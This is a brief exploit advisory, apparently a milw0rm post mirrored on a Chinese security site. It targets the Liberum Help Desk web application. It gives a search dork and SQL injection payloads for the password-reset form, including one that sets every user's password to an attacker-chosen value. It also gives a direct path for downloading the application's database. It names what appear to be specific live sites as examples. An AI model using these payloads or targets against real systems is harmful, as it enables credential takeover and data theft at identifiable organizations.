Liberum Help Desk (SQL/DD) Multiple Remote Vulnerabilities author : Cold z3ro, www.hackteach.org Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem" ============== [#] SQL Injection http://www.site.com/[path]/forgotpass.asp In uid insert SQL command's => SCMD ==> ' or '1=1 SCMD ==> ' or 'update tblusers set password = "z3ro" all passwords will be z3ro ============= [#] Database Disclosure http://www.site.com/[path]/db/helpdesk2000.mdb example : https://www.bauer.uh.edu/helpdesk/db/helpdesk2000.mdb http://www.ags2.com/helpdesk/db/helpdesk2000.mdb # milw0rm.com [2008-12-16]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论